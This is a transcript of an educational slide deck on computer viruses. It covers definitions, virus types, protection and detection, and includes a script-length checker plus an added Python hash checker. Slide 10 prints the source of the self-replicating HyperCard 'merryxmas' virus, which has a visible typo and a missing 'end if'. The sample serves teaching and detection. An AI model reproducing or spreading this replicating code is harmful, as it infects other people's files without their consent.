Computer Viruses - PowerPoint PPT Presentation

Slides: 11
Provided by: johnco159
Transcript and Presenter's Notes

1
Computer Viruses (and other Malicious Programs)
Computer Viruses and related programs have the ability to replicate themselves on an ever increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet (a Worm).
Other Malicious Programs may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages. These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).
2
Definitions
Virus - code that copies itself into other programs.
A Bacteria replicates until it fills all disk space, or CPU cycles.
Payload - harmful things the malicious program does, after it has had time to spread.
Worm - a program that replicates itself across the network (usually riding on email messages or attached documents, e.g., macro viruses).
Trojan Horse - instructions in an otherwise good program that cause bad things to happen (sending your data or password to an attacker over the net).
Logic Bomb - malicious code that activates on an event (e.g., date).
Trap Door (or Back Door) - undocumented entry point written into code for debugging that can allow unwanted users.
Easter Egg - extraneous code that does something cool. A way for programmers to show that they control the product.
3
Taxonomy of Malicious Programs
Need Host Program: Trapdoors, Logic Bombs, Trojan Horses, Viruses
Independent: Bacteria, Worms
4
Virus Phases
Dormant - waits for a trigger to start replicating.
Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for its own signature before infecting. Worms (like Melissa) spread over a network connection as executable attachments to email.
Triggering - starts delivering payload. Sometimes triggered on a certain date, or after a certain time after infection.
Execution - payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk clean. It may start the first phase over again.
5
Virus Protection
Have a well-known virus protection program, configured to scan disks and downloads automatically for known viruses.
Do not execute programs (or "macros") from unknown sources (e.g., PS files, Hypercard files, MS Office documents, Java, ...), if you can help it.
Configure MS Word and Excel to not automatically execute macros in documents (reset the defaults).
Avoid the most common operating systems and email programs, if possible.
6
Types of Viruses
Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.
Memory-resident Virus - lodges in main memory as part of the residual operating system.
Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses).
Stealth Virus - explicitly designed to hide from Virus Scanning programs.
Polymorphic Virus - mutates with every new host to prevent signature detection.
7
Macro Viruses
Microsoft Office applications allow macros to be part of the document. The macro could run whenever the document is opened, or when a certain command is selected (Save File).
A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail-address lists.
8
Virus Detection
1st Generation, Scanners searched files for any of a library of known virus signatures. Checked executable files for length changes.
2nd Generation, Heuristic Scanners look for more general signs than specific signatures (code segments common to many viruses). Checked files for checksum or hash changes.
3rd Generation, Activity Traps stay resident in memory and look for certain patterns of software behavior (e.g., scanning files).
4th Generation, Full Featured combine the best of the techniques above.
9
on stackScrLenChk
  --- JAC generic virus protection 11-8-95
  -- Only run the check from the Home stack itself
  if the short name of this stack = "Home" then
    put the script of stack "Home" into s
    put (the number of chars in s) into xChr
    -- Compare the current script length with the length stored in the card field
    if (xChr ≠ card field "StkScrLen") then
      answer "Home Stack Script Length Now" && xChr & ". It was" && (card field "StkScrLen") & ". Could it be a VIRUS ?" with "Leave" or "Reset"
      -- "Reset" accepts the new length as the baseline
      if (It = "Reset") then
        put xChr into card field "StkScrLen"
      end if
      set the visible of card field "StkScrLen" to False
    end if
  end if
end stackScrLenChk
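The length check performed by the handler above, next to the checksum or hash comparison listed under 2nd Generation on the Virus Detection slide, as an added Python example that is not part of the original slides. The file names and contents are constructed, and snapshot, audit and demo are illustrative names.

```python
import hashlib
import os
import tempfile


def snapshot(paths):
    """Record (length, SHA-256 hex digest) per file as the trusted baseline."""
    base = {}
    for p in paths:
        with open(p, "rb") as f:
            data = f.read()
        base[p] = (len(data), hashlib.sha256(data).hexdigest())
    return base


def audit(baseline):
    """Return {path: 'ok' | 'missing' | 'length-changed' | 'hash-changed'}."""
    findings = {}
    for p, (old_len, old_hash) in baseline.items():
        if not os.path.exists(p):
            findings[p] = "missing"
            continue
        with open(p, "rb") as f:
            data = f.read()
        if len(data) != old_len:        # what a length check can see
            findings[p] = "length-changed"
        elif hashlib.sha256(data).hexdigest() != old_hash:
            findings[p] = "hash-changed"  # same length: only the hash sees it
        else:
            findings[p] = "ok"
    return findings


def demo():
    """Constructed files: one untouched, one grown, one overwritten in place."""
    d = tempfile.mkdtemp()
    paths = [os.path.join(d, n) for n in ("clean.bin", "grown.bin", "patched.bin")]
    for p in paths:
        with open(p, "wb") as f:
            f.write(b"ORIGINAL PROGRAM BYTES " * 4)
    base = snapshot(paths)
    with open(paths[1], "ab") as f:     # content appended: length grows
        f.write(b"EXTRA")
    with open(paths[2], "r+b") as f:    # 8 bytes overwritten: length unchanged
        f.write(b"MODIFIED")
    return {os.path.basename(p): v for p, v in audit(base).items()}


if __name__ == "__main__":
    print(demo())
```

The third file is the case a length-only comparison reports as unchanged, which is why the baseline stores a hash as well.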
10
on openbackground --merryxmas
  merryxmas "on openbackground --merryxmas"
end openbackground

on closebackground --merryxmas
  merryxmas "on closebackground --merryxmas"
end closebackground

on idle --merryxmas
  put "on idle --merryxmas" into key
  if not (the script of this stack contains key) then merryxmas key
end idle

on merryxmas key
  set lockscreen to true
  set lockmessages to true
  set lockrecent to true
  put the userlevel into oldlevel
  set the userlevel to 5
  put the script of this stack into stackscript
  put the script of stack "Home" into homescript
  put "on openbackground --merryxmas" into hostscript
  if stackscript contains key then
    if homescript contains key then
    else
      set cantmodify of stack "Home" to false
      if not (cantmodify of stack "Home") then
        set the script of stack "Home" to homescript & return & lastlines(hostscipt,stackscript)
      end if
    end if
  else
    if homescript contains key then
      set cantmodify of this stack to false
      if not (cantmodify of this stack) then
        set the script of this stack to stackscript & return & lastlines(hostscript,homescript)
      end if
    else
      -- domenu "Quit Hypercard"
    end if
  set the userlevel to oldlevel
  set lockrecent to false
  set lockmessages to false
  set lockscreen to false
end merryxmas

function lastlines afterline,stuff
  put (number of lines in stuff) into total
  put line (total-53) to total of stuff into host
  repeat with x = 55 to total
    put line (total-x+1) of stuff & return & host into host
    if line 1 of host is afterline then exit repeat
  end repeat
  return host
end lastlines